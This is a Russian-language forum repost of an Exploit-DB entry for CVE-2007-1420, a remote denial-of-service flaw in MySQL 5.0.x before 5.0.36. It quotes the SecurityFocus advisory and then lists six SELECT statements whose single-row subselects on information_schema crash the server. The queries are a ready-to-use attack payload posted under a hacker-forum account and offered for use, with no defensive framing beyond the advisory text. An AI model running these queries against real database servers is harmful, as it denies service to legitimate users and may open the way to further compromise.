Exploit MySQL 5.0.x - Single Row SubSelect Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
29724
Проверка EDB
  1. Пройдено
Автор
S.STREICHSBIER
Тип уязвимости
DOS
Платформа
LINUX
CVE
cve-2007-1420
Дата публикации
2007-03-09
MySQL 5.0.x - Single Row SubSelect Remote Denial of Service
Код:
source: https://www.securityfocus.com/bid/22900/info

MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain select statements to database metadata.

An attacker can exploit this issue to crash the application, denying access to legitimate users. The attacker may also be able to execute arbitrary code, but this has not yet been confirmed.

NOTE: An attacker must be able to execute arbitrary SELECT statements on the vulnerable computer to exploit this issue. This may be through legitimate means or by exploiting other latent SQL-injection vulnerabilities.

Versions prior to 5.0.36 are vulnerable. 

SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT TRIM(LEADING FROM (SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY 1),1,1);
SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY 1),1,'lol');
 
Источник
www.exploit-db.com

Похожие темы